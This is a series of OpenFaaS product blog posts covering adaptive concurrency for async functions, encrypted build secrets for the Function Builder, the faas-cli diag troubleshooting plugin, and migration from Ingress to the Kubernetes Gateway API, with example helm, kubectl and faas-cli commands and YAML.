OpenFaaS - Serverless Functions Made Simple

What Adaptive Concurrency Means for Async Functions

2026-04-02T00:00:00+00:00

Learn how adaptive concurrency in the OpenFaaS queue-worker prevents overloading functions, reduces retries, and completes async batches faster — without per-function tuning.

Synchronous vs. asynchronous invocation

Any OpenFaaS function can be called synchronously (the default) or asynchronously via a queue. The difference is similar to calling a function and waiting for its return value, versus deferring work — like defer in Go, async/await in Node/Python, or submitting a job to a batch-processing queue.

Synchronous — caller waits for the result

The caller sends an HTTP request and waits. The gateway proxies it to the function and streams the response back. Simple and direct, but the caller is blocked for the full duration — if the function takes 5 minutes, the caller waits 5 minutes.

Asynchronous — caller returns immediately, work is processed in the background

The caller sends a request to /async-function/ and gets back a 202 Accepted with a X-Call-Id within milliseconds. The gateway serialises the request onto a NATS JetStream queue. The queue-worker subscribes, pulls messages off the queue, and invokes the function. If a X-Callback-Url header was provided, the result is POSTed there when done.

This is a hybrid of a batch-job queue and deferred execution — think of it as submitting a job and optionally subscribing to the result. It is ideal for long-running work, batch processing, webhooks with tight response-time contracts, and fan-out pipelines.

Where queue-worker dispatch falls short

By default the queue-worker uses greedy dispatch — pulling messages and sending them to the function as fast as possible. This works well and is used widely in production, but for functions with strict concurrency limits it can cause excessive retries, and requires careful per-function tuning for optimal performance.

Adaptive concurrency is a new dispatch mode that fixes this. The queue-worker learns each function’s capacity and throttles dispatch to match automatically. It addresses two problems in particular:

Known concurrency limit — the function has max_inflight set, capping concurrent requests per replica. The total capacity changes as replicas scale up and down.
Variable upstream capacity — the function depends on an external resource — a database, a third-party API — that can slow down or become overloaded. The function signals back-pressure by returning 429 itself.

How adaptive concurrency solves this

Adaptive concurrency removes the tuning burden. Instead of dispatching as fast as possible and dealing with rejections, the queue-worker learns how much work each function can handle and throttles the dispatch rate to match automatically.

The result:

Fewer retries — requests are held in the queue until the function can accept them
Faster batch completion — no time wasted in exponential back-off
No per-function tuning — the algorithm adapts to each function’s behaviour on its own
Handles dynamic capacity — automatically adjusts as replicas scale up and down or upstream capacity changes

Why does the default approach generate retries?

Without adaptive concurrency, the queue-worker uses what we call a greedy dispatch algorithm. It pulls messages from the NATS JetStream queue and sends them to the function as fast as possible. When a function has max_inflight set — say to 5 per replica — the first 5 requests succeed, and the rest are rejected with 429 status codes.

The queue-worker then retries the rejected requests with exponential back-off. As the autoscaler adds more replicas, capacity increases, more requests succeed, and the backlog eventually clears. But during this ramp-up period, a large proportion of the requests are retried one or more times.

How adaptive concurrency works

Adaptive concurrency flips the approach. Instead of dispatching as fast as possible and dealing with rejections, it learns the function’s capacity and throttles dispatch to match.

The algorithm is feedback-driven:

Start low — the queue-worker begins with a concurrency limit of zero for each function and grows it incrementally based on real responses.
Increase on success — after receiving a successful response, the limit is increased. After a sustained period without rejections, it scales up more aggressively.
Back off on rejection — after consecutive 429 responses, the limit is reduced with a safety margin below the discovered maximum to avoid repeatedly hitting the ceiling.
Proactive scaling — the queue-worker periodically checks whether there’s a backlog of queued work. If there is, it proactively increases the concurrency limit to fill available capacity.
Adapt to replica changes — as the autoscaler adds or removes replicas, the function’s ability to accept requests changes. The algorithm detects this through the success/failure feedback loop and adjusts accordingly.

The net effect is that the queue-worker holds messages in the queue until the function can accept them, rather than sending them only to have them rejected and retried.

Greedy vs. adaptive concurrency — a side-by-side comparison

To show the difference, we ran the same workload with both approaches. We deployed the sleep function from the OpenFaaS store with a max_inflight of 5 and a maximum of 10 replicas, then submitted a batch of asynchronous invocations.

The key results:

~50% faster completion time — adaptive concurrency completed the same batch of work approximately 50% quicker than the greedy approach.
Significantly fewer retries — with greedy dispatch, a large proportion of requests were retried (indicated by the rate of 429 responses in the Request Rate graph). Adaptive concurrency had far fewer, with the vast majority of requests completing on the first attempt.
Consistent invocation load — instead of the burst-and-retry pattern visible with the greedy approach (Gateway Inflight Requests graph), adaptive concurrency maintained a more constant rate of in-flight requests, smoothly utilising available capacity.
Lower overall resource usage — the greedy approach pushed the number of replicas higher in some tests due to the background noise from 429 retries inflating the perceived load on the system.

The fundamental insight is simple: the fewer the retries, the lower the cumulative exponential back-off time, and the shorter the overall processing time.

When to use adaptive concurrency

Adaptive concurrency helps whenever function capacity is limited — whether that limit is known upfront or varies at runtime. It works with any autoscaling mode (capacity, queue-based, RPS) and the queue-worker learns the capacity regardless of how replicas are being scaled.

Functions with a known concurrency limit

When a function has max_inflight set, each replica can only handle a fixed number of concurrent requests. This is the most common case and is ideal for:

PDF generation — headless Chrome with Puppeteer can only run 1–2 browsers per replica
ML inference — a GPU-bound model serving function where only one inference can run at a time (max_inflight=1)
Video transcoding / image processing — CPU or memory-intensive work where each replica handles a small number of jobs
Data ETL — batch processing pipelines where each step has a bounded throughput

The right max_inflight value depends on your function — it may require experimentation and monitoring to find the optimal setting. Once set, adaptive concurrency handles the rest.

Example: PDF generation at scale

In a previous post, Generate PDFs at scale on Kubernetes, we showed how to run headless Chrome with Puppeteer to generate hundreds of PDFs. Each replica can only run a small number of browsers at once, so max_inflight is set to 1 or 2. When a batch of 600 pages hits the queue, the greedy dispatch approach floods the function with requests, most of which are rejected with 429s. To get good results, you had to carefully tune the retry configuration — maxRetryWait, initialRetryWait, and maxRetryAttempts — and even then a large portion of the processing time was spent in exponential back-off.

With adaptive concurrency, the queue-worker learns that each replica can handle just one or two browsers and throttles dispatch to match. As replicas scale up, the concurrency limit rises automatically. The queue drains faster because requests aren’t wasted on retries, and you don’t need to tune retry parameters to get optimal throughput.

Functions with variable upstream capacity

Not every capacity limit is known in advance. Some functions depend on external resources that can slow down or become temporarily unavailable:

Database-backed functions — a downstream database under heavy load starts timing out or rejecting connections
Third-party API calls — an external service applies its own rate limiting or experiences degraded performance
Shared upstream services — a microservice your function depends on is overloaded and responding slowly

In these cases, the function itself can return a 429 status code to signal back-pressure to the queue-worker. The adaptive concurrency algorithm responds the same way — it reduces the dispatch rate, waits, and probes for recovery. When the upstream resource recovers, the concurrency limit climbs back up automatically.

This means you don’t need max_inflight to benefit from adaptive concurrency. As long as your function returns 429 when it can’t handle more work, the queue-worker will adapt.

Try it out

Adaptive concurrency is enabled by default when using function mode in the JetStream queue-worker. If you’re already running function mode and you are on the latest OpenFaaS release, you’re using it.

Deploy a function with a concurrency limit and capacity-based autoscaling:

faas-cli store deploy sleep \
  --label com.openfaas.scale.max=10 \
  --label com.openfaas.scale.target=5 \
  --label com.openfaas.scale.type=capacity \
  --label com.openfaas.scale.target-proportion=0.9 \
  --env max_inflight=5

Submit a batch of asynchronous invocations:

hey -m POST -n 500 -c 4 \
  http://127.0.0.1:8080/async-function/sleep

Watch the Grafana dashboard for the queue-worker to see adaptive concurrency in action. You’ll see the concurrency limit climb as replicas scale up, then stabilise as capacity is matched.

The queue depth drops steadily as the queue-worker increases inflight requests in step with available capacity — no sudden spikes or idle periods.

As replicas scale from 1 to 6, the in-flight load climbs smoothly to ~25. The 429 response rate stays low throughout — the queue-worker throttles dispatch to match capacity rather than flooding the function with requests.

Wrapping up

The greedy dispatch algorithm has served OpenFaaS customers well and continues to be a reliable option. But for workloads with hard concurrency limits, adaptive concurrency is a meaningful improvement: it completes the same work faster by avoiding unnecessary retries, requires less per-function tuning, and makes better use of available capacity as functions scale up and down.

It’s enabled by default in function mode — no changes needed to start benefiting from it.

To disable adaptive concurrency and revert to greedy dispatch, set the following in your OpenFaaS Helm values:

jetstreamQueueWorker:
  adaptiveConcurrency: false

If you have questions, or want to share results from your own workloads, reach out to us via your support channel of choice whether that’s Slack, the Customer Community on GitHub, or Email.

Encrypt build-time secrets for the Function Builder

2026-03-24T00:00:00+00:00

Learn how to pass private registry tokens, API keys, and certificates into the Function Builder - encrypted end-to-end.

Introduction

Build secrets are already supported for local builds and CI jobs using faas-cli pro build. In that workflow, the secret files live on the build machine and are mounted directly into Docker’s BuildKit. There’s no network transport involved.

The Function Builder API is different. It’s designed for building untrusted code from third parties - your customers. A SaaS platform takes user-supplied source code, sends it to the builder over HTTP, and gets back a container image. The build happens in-cluster, without Docker, without root, and without sharing a Docker socket.

                           Kubernetes cluster
                          ┌──────────────────────────────┐
  faas-cli /              │                              │
  Your API/dashboard      │  pro-builder      buildkit   │   registry
  ┌───────────────┐       │  ┌──────────┐  ┌──────────┐  │  ┌─────────┐
  │  source code  │──tar──│─▶│  unseal  │──│  build   │──│─▶│  image  │
  │  + sealed     │ HTTP  │  │  secrets │  │  + push  │  │  │         │
  │    secrets    │ HMAC  │  └──────────┘  └──────────┘  │  └─────────┘
  └───────────────┘       │                              │
                          └──────────────────────────────┘

The question is: what happens when those builds need access to private resources? A Python function might need to pip install from a private PyPI registry. A Node.js function might need packages from a private npm registry. A function might need a private CA certificate to pull dependencies from an internal mirror.

Since the Function Builder launched, most customers haven’t needed build-time credentials - Go users vendor their dependencies, and many teams use public registries. Others have found workarounds where they could. But as platforms mature and customer requirements evolve, the need for private package registries comes up.

Waylay.io has been using the Function Builder since 2021 to build functions for their industrial IoT and automation platform. As their customers started needing pip modules from private registries, they reached out and we worked together to develop a proper solution. Build secrets use Docker’s --mount=type=secret mechanism, which means credentials are only available during the specific RUN instruction that needs them - they never end up in image layers and they’re not visible in docker history. We added NaCl box encryption (Curve25519 + XSalsa20-Poly1305) on top so that secrets are protected over the wire between the client and the builder, even over plain HTTP.

The result is a new feature in the Function Builder that lets you pass secrets into RUN --mount=type=secret instructions in your Dockerfiles. The secrets are encrypted client-side by faas-cli using the builder’s public key, included in the build tar, and decrypted in-memory by the builder just before the build runs. They never appear in image layers, they’re never written to disk in plaintext, and they never travel in plaintext over the wire - even if the connection between your client and the builder is plain HTTP.

How it works

The builder generates a Curve25519 keypair at startup. The public key is available via a /publickey endpoint. When faas-cli sends a build with secrets, it:

Encrypts each secret value independently using NaCl box
Includes the sealed secrets in the build tar as com.openfaas.secrets
Signs the entire tar with HMAC-SHA256 (as before)

The builder receives the tar, validates the HMAC, extracts the sealed file, decrypts each value using its private key, and passes them to BuildKit as --mount=type=secret mounts. After the build, the decrypted values are discarded.

The sealed file format uses per-value encryption with visible key names, so you can see which secrets are included without being able to read their values:

version: v1
algorithm: nacl/box
key_id: TrZKmwyy
public_key: TrZKmwyyTHBflZBF98y/j/2vn8wDZsMkX7yvUUGLUUM=
secrets:
    api_key: 
    pip_index_url: 

This means the file is safe to commit to git. You get an audit trail of which keys were added or removed, and you can see when a value has changed by its ciphertext - all without needing the private key.

Part A: Setting up the builder with build secrets

The following steps let you try the full workflow on a local KinD cluster before moving to a live environment. You’ll need faas-cli 0.18.6 or later, helm, kubectl, kind, and an OpenFaaS for Enterprises license.

Create a test cluster

kind create cluster --name build-secrets-test

Create the namespace and license secret

kubectl create namespace openfaas

kubectl create secret generic openfaas-license \
  -n openfaas \
  --from-file license=$HOME/.openfaas/LICENSE

Create a registry credential secret

For testing, we’ll use ttl.sh which is a free ephemeral registry that doesn’t require authentication:

cat <<'EOF' > ttlsh-config.json
{"auths":{}}
EOF

kubectl create secret generic registry-secret \
  -n openfaas \
  --from-file config.json=./ttlsh-config.json

For a private registry, see the helm chart README for how to configure authentication.

Generate secrets

Two things are needed: a keypair for encrypting build secrets, and a payload secret for HMAC request signing.

faas-cli secret keygen
faas-cli secret generate -o payload.txt

Wrote private key: key
Wrote public key:  key.pub
Key ID:            TrZKmwyy

Create the Kubernetes secrets

kubectl create secret generic -n openfaas \
  payload-secret --from-file payload-secret=payload.txt

kubectl create secret generic -n openfaas \
  pro-builder-build-secrets-key --from-file key=./key

Deploy the builder

helm repo add openfaas https://openfaas.github.io/faas-netes/
helm repo update

helm upgrade pro-builder openfaas/pro-builder \
  --install -n openfaas \
  --set buildSecrets.privateKeySecret=pro-builder-build-secrets-key

Wait for it to be ready:

kubectl rollout status deployment/pro-builder -n openfaas

Verify

Port-forward and check the public key endpoint:

kubectl port-forward -n openfaas deploy/pro-builder 8081:8080 &

curl -s http://127.0.0.1:8081/publickey | jq

{
  "key_id": "TrZKmwyy",
  "algorithm": "nacl/box",
  "public_key": "TrZKmwyyTHBflZBF98y/j/2vn8wDZsMkX7yvUUGLUUM="
}

The key_id is derived from the public key automatically. You don’t need to configure it. The builder is ready.

Part B: Building a function with secrets

Let’s walk through a complete example. We’ll create a function that reads a secret at build time using the classic watchdog.

Create the function

faas-cli new --prefix ttl.sh/test-build-secrets \
  --lang dockerfile sealed-test

Replace sealed-test/Dockerfile with:

FROM ghcr.io/openfaas/classic-watchdog:latest AS watchdog

FROM alpine:3.22.0

COPY --from=watchdog /fwatchdog /usr/bin/fwatchdog

RUN mkdir -p /home/app

RUN --mount=type=secret,id=api_key \
    cat /run/secrets/api_key > /home/app/api_key.txt

ENV fprocess="cat /home/app/api_key.txt"

CMD ["fwatchdog"]

The --mount=type=secret,id=api_key line tells BuildKit to mount the secret at /run/secrets/api_key during that RUN step. It’s only available during the build - it doesn’t end up in any image layer.

Edit stack.yaml to add build_secrets:

version: 1.0
provider:
  name: openfaas
  gateway: http://127.0.0.1:8080
functions:
  sealed-test:
    lang: dockerfile
    handler: ./sealed-test
    image: ttl.sh/test-build-secrets/sealed-test:2h
    build_secrets:
      api_key: sk-live-my-secret-key

Build with the remote builder

If you don’t already have the payload secret file locally, fetch it from the cluster:

export PAYLOAD=$(kubectl get secret -n openfaas payload-secret \
  -o jsonpath='{.data.payload-secret}' | base64 --decode)
echo $PAYLOAD > payload.txt

If you don’t have the public key file, fetch it from the builder:

curl -s http://127.0.0.1:8081/publickey | jq -r '.public_key' > key.pub

Then publish:

faas-cli publish \
  -f stack.yaml \
  --remote-builder http://127.0.0.1:8081 \
  --payload-secret ./payload.txt \
  --builder-public-key ./key.pub

The secrets are encrypted by faas-cli before sending. You’ll see the build logs streamed back:

[0] > Building sealed-test.
Building: ttl.sh/test-build-secrets/sealed-test:2h with dockerfile template. Please wait..
2026-03-24T11:15:13Z [stage-1 2/4] COPY --from=watchdog /fwatchdog /usr/bin/fwatchdog
2026-03-24T11:15:13Z [stage-1 3/4] RUN mkdir -p /home/app
2026-03-24T11:15:13Z [stage-1 4/4] RUN --mount=type=secret,id=api_key ...
2026-03-24T11:15:14Z exporting to image
sealed-test success building and pushing image: ttl.sh/test-build-secrets/sealed-test:2h

Verify

Run the image and invoke the watchdog:

docker run --rm -d -p 8081:8080 --name sealed-test \
  ttl.sh/test-build-secrets/sealed-test:2h

curl -s http://127.0.0.1:8081

docker stop sealed-test

sk-live-my-secret-key

The secret was encrypted on the client, sent over the wire inside the build tar, decrypted by the builder, and mounted into the Dockerfile during the build.

A real-world example: private PyPI registry

In production, you’d use this to pass credentials for private package registries. Here’s what that would look like for a Python function using the python3-http template.

In your stack.yaml:

functions:
  data-processor:
    lang: python3-http
    handler: ./data-processor
    image: registry.example.com/data-processor:latest
    build_secrets:
      pip_index_url: https://token:pypi-secret@my-org.jfrog.io/artifactory/api/pypi/python-local/simple

Then in the template’s Dockerfile, you’d change the pip install line to mount the secret:

-RUN pip install --no-cache-dir --user -r requirements.txt
+RUN --mount=type=secret,id=pip_index_url \
+    pip install --no-cache-dir --user \
+    --index-url "$(cat /run/secrets/pip_index_url)" \
+    -r requirements.txt

The same pattern works for npm, Go private modules, or any package manager that takes credentials at install time.

Binary values like CA certificates are also supported. You can seal them from files instead of literals:

faas-cli secret seal key.pub \
  --from-file ca.crt=./certs/internal-ca.crt \
  --from-literal pip_index_url=https://token:secret@registry.example.com/simple

Sealing secrets for CI pipelines

If you’re integrating with a CI system rather than using faas-cli publish directly, you can seal secrets into a file ahead of time:

faas-cli secret seal key.pub \
  --from-literal api_key=sk-live-my-secret-key

This writes com.openfaas.secrets in the current directory. Include it in the build tar alongside com.openfaas.docker.config and the context/ folder, and the builder will pick it up.

You can inspect a sealed file without the builder:

faas-cli secret unseal key

api_key=sk-live-my-secret-key

New faas-cli commands

We’ve added four new subcommands to faas-cli secret:

Command	Purpose
`faas-cli secret keygen`	Generate a Curve25519 keypair
`faas-cli secret generate`	Generate a random secret value for the pro-builder’s HMAC signing key
`faas-cli secret seal key.pub --from-literal k=v`	Seal secrets into `com.openfaas.secrets`
`faas-cli secret unseal key`	Decrypt and inspect a sealed file (requires access to the private key)

Wrapping up

Build secrets for local builds and CI have been available for a while via faas-cli pro build. This feature brings the same capability to the Function Builder API, where builds happen in-cluster on behalf of third-party users and the secrets need to be protected over the wire.

We developed this together with Waylay based on their production requirements, using NaCl box encryption to protect secrets over the wire. The seal package in the Go SDK is generic and could be reused for other use-cases in the future.

If you’re already using the Function Builder, you can start using build secrets by upgrading the helm chart and faas-cli. If you’re new to the builder, see the Function Builder API docs for the full setup guide.

If you have questions, feel free to reach out to us.

Introducing: Painless support and hands-off architecture reviews

2026-03-13T00:00:00+00:00

Learn how the new diag plugin for faas-cli can be used to diagnose issues and make architecture reviews a hands-off exercise.

It helps you (or us together) to answer two questions: What’s breaking? Are we using OpenFaaS to its full potential?

Diag builds a HTML report, an instructions file for AI agents, graphs, and visualisations so you can explore the data and share if necessary, to get help. One command, no manual steps, nothing to forget.

Two case-studies

Misconfiguration leads to an outage in production

An enterprise customer using OpenFaaS for 3 years accidentally changed their gateway’s timeout to 0.5s from 2 hours.

An inadvertent change to values.yaml on the customer’s end enforced a half second timeout, causing functions to time-out unexpectedly. We requested a “diag” run, and within a 30 minutes had found the issue, advised the team, and got them up and running again.

It’s always DNS. Actually it was a bad node in EKS.

A defense contractor in the US that uses OpenFaaS for building AI analytics software started to complain of timeouts and reliability issues in production.

We sent them the troubleshooting guide, and said “Can you try these?” After a couple of weeks, they’d not run any of the commands, so we went them specific commands - they ran these and shared the output. It was helpful, but we needed more.

We then went down the route of trying to reproduce the issue locally, and couldn’t. We told the team to try HTTP readiness probes, which sometimes cure this kind of issue.

Eventually, after sending commands back and forth over the course of a few days, they sent over a “diag” run.

We saw network timeouts between core Pods like NATS, the Gateway and Prometheus. Even between containers in the same Pod. The insights helped them track it down to an EKS node that had “gone bad” and needed replacement.

Two main uses-cases

Self-service, and pain-free support

When something goes wrong in production, the last thing you want is to be sent to a troubleshooting guide and told to run half a dozen commands. Your product is on fire. People are starting to point the finger of blame. You just want it fixed.

Everything that could be relevant is collected: deployments, function definitions, logs, events, pod status, and Prometheus metrics. Run it, send us the archive, and we can start working on your issue immediately, without a back-and-forth asking you to gather more data.

Architecture review and Value extraction

Beyond troubleshooting, the data and graphs collected by faas-cli diag can help you answer broader questions about your setup: are you getting the most value possible from the product? Is there an OpenFaaS feature that could help with your type of workload? Is there a production incident waiting to happen because something’s been mixed up in the values.yaml?

The report generated by diag gives you a starting point. You can inspect invocation rates, error rates, replica counts, and resource usage without needing to set up dashboards or port-forward to Prometheus.

Reviews no longer have to be annual ceremonies.

What does it collect?

The diag tool gathers the following from your cluster:

Deployment YAMLs — exported specs for OpenFaaS core components and functions
Function CRs — Custom Resource definitions for deployed functions
Kubernetes events — cluster events from the OpenFaaS and function namespaces
Pod status — output from kubectl get and kubectl describe for all relevant pods
Container logs — streamed via stern for real-time and retrospective log collection
Node info — inventory and descriptions for all cluster nodes
Helm values — user-supplied values for the OpenFaaS Helm release
Ingress & Gateway API — Ingress, IngressClass, HTTPRoute, and GatewayClass resources
Network Policies — NetworkPolicy resources from OpenFaaS and function namespaces
Prometheus metrics — metrics snapshots and visualisations covering replicas, request rates, latencies, and resource usage

All collected data is written to a local directory and archived into a .tar.gz file for easy sharing. The tool is 100% offline — no information is shared with anyone, including OpenFaaS Ltd, by default.

Install the diag plugin

Install the plugin, and check the version. It’s useful to run this command before very run - because we’re actively improving the tool as we get feedback.

faas-cli plugin get diag
faas-cli diag version

Generate a report

By default, diag reads configuration from diag.yaml in your current directory. Generate that file first, then run the tool:

# Generate a `diag.yaml` config file
faas-cli diag config simple > diag.yaml

# Run diagnostics
faas-cli diag

The first command creates a diag.yaml with sensible defaults that works for most setups. The second starts the collection: it sets up port-forwards, streams logs, collects Kubernetes resources, and scrapes Prometheus metrics. Press Control+C once to stop gracefully, it will finish collecting and write all output to disk.

Staging and production

Here’s how you could collect data from both production and staging:

mkdir ~/diag
cd ~/diag

# Generate an initial config:
faas-cli diag config simple > diag.yaml

kubectl config use-context eks-staging-us-east-1
faas-cli diag "staging"

kubectl config use-context eks-prod-us-east-1
faas-cli diag "prod"

For more advanced options like targeting specific functions or using an external Prometheus instance, see the full configuration reference at the end of this post.

Running at scale with hundreds of namespaces

If you’re running a multi-tenant setup with hundreds of function namespaces, you probably don’t want to collect from all of them at once. Use the --namespace flag to target a specific subset:

faas-cli diag config simple --namespace tenant-1 --namespace tenant-2

Or use '*' to automatically discover all OpenFaaS function namespaces:

faas-cli diag config simple --namespace '*'

Exploring the report

Data is saved to ./run - either with a date and timestamp, or with the name of the run you passed.

diag "prod" creates ./run/diag/
diag on its own creates i.e. ./run/2026-03-10_14-30-00/

To explore the data, you can open the index.html file in those folders.

The report includes visualisations of Prometheus metrics such as function invocation rates, error rates, and replica counts, giving you a quick overview of cluster health without needing to set up Grafana or port-forward to Prometheus yourself.

The report summary page with quick links to metrics, CRDs, pods, events, and logs per namespace.

The metrics dashboard showing function replicas, request rates by status code, and execution duration.

Diag is AI ready

The output also includes an AGENTS.md file that instructs AI coding agents like Claude Code, Codex, and similar tools to interpret and diagnose issues from the collected data. This gives you a fast first pass for support investigations or architecture reviews using AI, while keeping the decision loop with your team.

But before you load up Claude Code, Codex, or Gemini, make sure that your organisation has any of the following:

A zero-data retention agreement with your inference provider.
Your own private deploymeny of a model to Azure/AWS/Google etc, with approved data policies.
Or access to private, airgapped local GPUs and AI models.
Have redacted all credentials, tokens, customer identifiers or confidential information

If in doubt, do not use any form of AI with the output, most issues can be found by humans on your end or ours.

Useful flags and options

Flag / Command	Description	Example
`-d/--duration`	Auto-stop after a set duration	`faas-cli diag -d 5m`
`--age`	Collect logs from a past time window	`faas-cli diag --age 1h`
`diag [run-name]`	Custom name for the run (positional argument)	`faas-cli diag incident-456`

Wrapping up

The new faas-cli diag plugin gives you a fast, repeatable way to collect everything needed for support requests and architecture reviews. Instead of manually running a dozen kubectl commands, you get a single workflow that captures logs, events, pod status, and metrics — all archived and ready to share.

Whether you’re debugging an incident or reviewing your cluster setup, the workflow is the same: run faas-cli diag and explore the report. If you need our help, send us the archive.

For more details, see the Troubleshooting docs.

Appendix: full configuration reference

Generate the full configuration template with:

faas-cli diag config full

# Identify the cluster and kubectl context
clusterName: "production-cluster"
context: ""  # Leave empty to use current context

# Namespaces to collect from
namespaces:
  openfaas: openfaas
  functions:
    - openfaas-fn
    - staging-fn
    - production-fn

# Function filter patterns (glob-style)
functions:
  - 'api-*'
  - 'webhook-*'

# Prometheus configuration
prometheus:
  enabled: true
  service: prometheus
  targetPort: 9090
  # Use a custom URL if Prometheus is outside the openfaas namespace
  # url: "http://prometheus.monitoring.svc.cluster.local:9090"

# Gateway configuration
gateway:
  enabled: true
  service: gateway
  targetPort: 8080
  autoAuth: true

# What to collect
collection:
  deployments: true
  functionCRs: true
  events: true
  podStatus: true
  logs: true
  metrics: true
  logAge: "1h"

# Output directory and run name
output:
  directory: "./run"
  # runName: "incident-123"

A few options worth noting:

context - lets you target a specific kubectl context if you manage multiple clusters. Leave it empty to use whichever context is currently active.
functions - uses glob patterns to filter which functions are collected. Use '*' for all, or patterns like 'api-*' to narrow the scope on large clusters.
prometheus.url - lets you point to an external Prometheus instance, bypassing the automatic port-forward.
collection - toggles to disable individual collectors if you only need a subset of the data.
logAge - controls how far back to collect logs retrospectively. Leave it empty to collect all available logs.

How to Migrate OpenFaaS to Gateway API

2026-02-13T00:00:00+00:00

In this post we’ll walk through the current options for getting traffic into OpenFaaS on Kubernetes, the latest Gateway API, and how to migrate from Ingress.

Table of contents:

Preamble: The unfortunate double-whammy
Introduction to Gateway API
Prerequisites
Check and update Gateway API CRDs
Install a Gateway API Implementation
Install cert-manager
Create a cert-manager Issuer
Expose the OpenFaaS gateway with TLS
Add the OpenFaaS dashboard
Final thoughts and next steps

Preamble: The unfortunate double-whammy

For as long as we can remember, Ingress has been the de facto standard for exposing HTTP services from Kubernetes clusters. It has always had a very simple syntax, and has only gone through one major change, graduating from extensions/v1beta1 to networking.k8s.io/v1 in Kubernetes 1.19 (around 2019). The key change was the introduction of the pathType field for precise path matching and the IngressClass (instead of annotations) resource for consistent controller configuration.

Honestly, we don’t need to explain how Ingress works, it’s so well understood and widely used.

But there was a glint in the eyes of the Kubernetes maintainers, and they wanted to provide something that was much more ambitious in its scope, that addressed needs that OpenFaaS customers don’t tend to have. The Istio service mesh was a precursor for this, with its own set of add-ons with similar names, and was eventually crystallised into the Gateway API.

Most OpenFaaS and Inlets customers we’ve encountered have been using Ingress (many moved away from Istio and service meshes) preferring simplicity and ease of use. They tended to always be using the ingress-nginx controller. A brief history: Ingress Nginx started off as a hobby project for a single maintainer, who was unable to find corporate sponsorship or support from the CNCF, and had to give it up in 2019. Shortly after 2-3 maintainers stepped up and ran it reasonably well as a spare-time project, but without sustainable backing as part of a day job, the same thing started to happen again. Issues were being reported, quicker than they could be fixed.

So the Kubernetes maintainers made a judgement call, they decided to announce project would be officially mothballed in March 2026. No further updates, or security patches. That’s a big deal.

Why is this a double whammy?

The announcement had some choice words: “if you must continue to use Ingress” - sounds a bit like you’re in the wrong if you are using something that fits your needs. It has an undertone of Ingress being a legacy or inappropriate solution, potentially something that may eventually go the way of ingress-nginx. We focus on simple solutions that work well for our users, however, reading between the lines, we want to make sure you’re prepared for the future.

So if we’re pragmatic, we have a couple of options:

try to move to an Ingress Controller like Traefik which can support some of the behaviours and settings of Ingress Nginx,
or move to Gateway API (the developing, but approved future standard).

Rather than installing one chart, and creating a basic Ingress resource, and adding 1-2 annotations, we have a much more varied path. Gateway API intends to provide an agnostic overlay, shying away from annotations as extensions, and focusing on a new set of decoupled API objects.

It’s only a bit of YAML, how hard could it be?

For OpenFaaS customers, we’re trying to make this transition as simple as possible, starting with this guide that converts YAML for like for like. But one of our other products Inlets Uplink integrates ingress-nginx much more deeply and relies on its annotations, that is going to be significantly more work both for the controller itself, and for users needing to upgrade.

Gateways everywhere

The core of OpenFaaS is the OpenFaaS Gateway. This was created in 2016 and has nothing to do with the Gateway API for Kubernetes. Unfortunately, the terms are overloaded, so many of you will end up with “openfaas-gateway” (Gateway API object) and a “gateway” (Service object for the OpenFaaS Gateway), and both may well be in the OpenFaaS namespace.

We’re sorry, there’s not much we could do about this, but if you can think of a better name or a more descriptive term, we would appreciate your input.

Introduction to Gateway API

Kubernetes Gateway API is an add-on to Kubernetes, which:

Aims to abstract vendor implementations under one set of APIs
Acts as an add-on, rather than a native feature
Attempts to split the roles of cluster administrator and application developer through different resources.
Covers the main use-cases of Ingress Controllers, such as TLS termination, path-based routing, and load balancing.

From the perspective of OpenFaaS, there are three Gateway API resources we need:

GatewayClass - maps to IngressClass - i.e. whether you’re using Kgateway, Istio, Envoy Gateway, or another implementation.
Gateway - maps to a LoadBalancer Service with one or more listeners and handles TLS configuration.
HTTPRoute - binds paths and/or hostnames to backend services.

This separation means that a cluster operator can manage TLS termination and listener configuration in a Gateway, while application teams define routing via HTTPRoute resources. It also means that the same configuration works across many conformant implementations including Envoy Gateway, Traefik, NGINX Gateway Fabric, and Istio.

The openfaas chart has built-in support to generate Ingress objects. Once we have enough feedback from customers, we’ll know if and how you want us to add support for Gateway API resources into the chart. For now, this guide shows how to create the resources through manual YAML files, which we think is more useful for building understanding.

We’ll: Install a Gateway API implementation, configure cert-manager, and define a Gateway and HTTPRoute both the OpenFaaS Gateway and Dashboard.

For any of the YAML examples, you can either create a file, and run kubectl apply -f ./name.yaml or kubectl apply -f - then paste in the snippet directly and hit enter then Control + D.

Prerequisites

A Kubernetes cluster with OpenFaaS installed via Helm
A domain name with the ability to create DNS records
A public IP address or load balancer (i.e. EKS, GKE, or AKS), or inlets-operator which does the same for any private or NAT’d or firewalled Kubernetes cluster

Check and update Gateway API CRDs

Some Kubernetes distributions ship their own version of the Gateway API CRDs, which may not match those your implementation wants to use.

Check with:

$ kubectl get crd | grep gateway.networking.k8s.io

backendtlspolicies.gateway.networking.k8s.io          2026-02-13T15:06:49Z
gatewayclasses.gateway.networking.k8s.io              2026-02-13T15:06:49Z
gateways.gateway.networking.k8s.io                    2026-02-13T15:06:49Z
grpcroutes.gateway.networking.k8s.io                  2026-02-13T15:06:49Z
httproutes.gateway.networking.k8s.io                  2026-02-13T15:06:49Z
referencegrants.gateway.networking.k8s.io             2026-02-13T15:06:49Z
tcproutes.gateway.networking.k8s.io                   2026-02-13T15:07:31Z
tlsroutes.gateway.networking.k8s.io                   2026-02-13T15:07:31Z
udproutes.gateway.networking.k8s.io                   2026-02-13T15:07:31Z

For this example, it’s best to let Envoy Gateway handle the CRD installation with versions it supports, so remove all CRDs that may be preloaded in your cluster:

# example: replace v1.1.0 with the version you want
kubectl delete -f https://github.com/kubernetes-sigs/gateway-api/releases/download/v1.1.0/standard-install.yaml
kubectl delete -f https://github.com/kubernetes-sigs/gateway-api/releases/download/v1.1.0/experimental-install.yaml

Install a Gateway API Implementation

Early feedback from customers suggests that Envoy Gateway may well end-up being the equivalent of “ingress-nginx” in the Gateway API world. It is one of the many conformant implementations.

gatewayClassName is similar to the old ingressClassName in the Ingress API. It is a string that identifies the Gateway API implementation that should be used to manage the Gateway and HTTPRoute resources. So if you want to use a different implementation, just change the gatewayClassName in any examples and install it using its documentation, instead of that of Envoy Gateway.

Watch out for this gotcha: many tools such as cert-manager, may require additional settings or flags to turn on Gateway API support.

Install Envoy Gateway using its Helm chart. The chart includes the Gateway API CRDs, so no separate CRD installation is needed.

Bear in mind that Envoy Gateway maintains its own compatibility matrix.

helm install eg oci://docker.io/envoyproxy/gateway-helm \
  --version v1.7.0 \
  -n envoy-gateway-system \
  --create-namespace

